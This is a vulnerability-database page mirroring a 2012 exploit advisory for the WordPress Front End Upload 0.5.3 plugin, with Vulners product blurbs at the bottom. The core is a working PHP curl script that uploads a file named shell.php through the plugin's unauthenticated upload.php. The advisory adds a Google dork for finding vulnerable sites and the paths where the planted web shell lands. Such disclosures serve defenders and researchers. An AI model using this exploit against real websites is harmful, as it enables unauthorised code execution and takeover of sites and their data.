Lucene search
K

WordPress Front End Upload 0.5.3 Shell Upload

🗓️ 08 Jun 2012 00:00:00Reported by Adrien ThierryType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Wordpress Front-End-Upload 0.5.3 Arbitrary File Upload Vulnerabilit

Code
`# Exploit Title: Wordpress front-end-upload 0.5.3 Arbitrary File Upload  
# Google Dork: inurl:wp-content/plugins/front-end-upload/  
# Date: 31/05/2012  
# Exploit Author: Adrien Thierry  
# Vendor Homepage: http://mondaybynoon.com/20120102/announcing-front-end-upload-wordpress-plugin/  
# Software Link: http://downloads.wordpress.org/plugin/front-end-upload.0.5.3.zip  
# Version: 0.5.3  
  
  
*** FRONT-END-UPLOAD PRO is probably vulnerable ***  
  
page upload.php is vulnerable to Remote File Upload. Code :  
  
<?php  
$u="whatelse.php";  
$c = curl_init("http://site.com/wp-content/plugins/front-end-upload/upload.php");  
curl_setopt($c, CURLOPT_POST, true);  
curl_setopt($c, CURLOPT_POSTFIELDS,  
array('file'=>"@$u",'name'=>"shell.php"));  
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);  
$e = curl_exec($c);  
curl_close($c);  
echo $e;   
?>  
  
  
If plugin isn't active, shell could be found at :  
http://site.com/wp-content/plugins/front-end-upload/FEU_DESTINATION_DIR/shell.php  
else  
http://site.com/wp-content/uploads/iti_feu_uploads/shell.php  
  
#########################################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Jun 2012 00:00Current
0.4Low risk
Vulners AI Score0.4
21